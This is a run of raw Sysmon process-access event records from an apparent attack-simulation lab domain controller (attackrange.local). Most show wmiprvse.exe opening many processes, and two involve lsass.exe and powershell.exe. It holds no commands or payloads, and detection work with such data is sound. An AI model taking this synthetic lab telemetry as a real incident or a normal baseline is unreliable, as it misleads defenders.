16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240444Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla 